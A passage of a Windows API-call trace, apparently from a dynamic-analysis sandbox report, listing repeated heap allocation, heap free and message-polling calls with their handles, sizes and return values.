lpMsg=0x7df984) returned 0 [0257.612] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.612] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.612] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.612] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.612] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.612] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.612] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.612] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.612] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.613] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.613] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.613] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.613] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.613] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.613] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.613] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.613] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.613] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.613] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.613] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b58 [0257.613] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.613] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.613] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.613] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.613] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.613] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.613] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.613] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.613] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.614] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.614] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.614] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.614] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.614] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.614] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.614] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.614] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.614] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b58 [0257.614] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.614] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.614] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.614] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.614] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.614] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.614] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.614] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.615] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.615] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.615] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.615] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.615] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.615] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.615] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.615] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.615] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.615] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b58 [0257.615] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.615] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.615] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.615] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.615] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.615] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.615] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.615] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.615] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.615] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.616] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.616] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.616] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.616] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.616] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.616] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.616] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.616] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b58 [0257.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdf350 [0257.616] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.616] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.616] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.616] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.616] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.616] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.616] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.616] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.616] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.617] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.617] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.617] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.617] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.617] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.617] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.617] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.617] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.617] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01878 [0257.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc019b8 [0257.617] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.617] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.617] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.617] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.617] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.617] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.617] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc019a8 [0257.617] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.617] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.617] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.618] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.618] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d620 [0257.618] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019b8 [0257.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01998 [0257.618] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019b8 [0257.618] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.618] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.618] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.618] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.618] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.618] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.618] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc019c8 [0257.618] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.618] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.618] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.618] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01998 [0257.619] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc019b8 [0257.619] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.619] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.619] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.619] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.619] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.619] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.619] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.619] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.619] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.619] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.619] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.619] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.619] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.619] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.619] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.619] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.619] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.619] 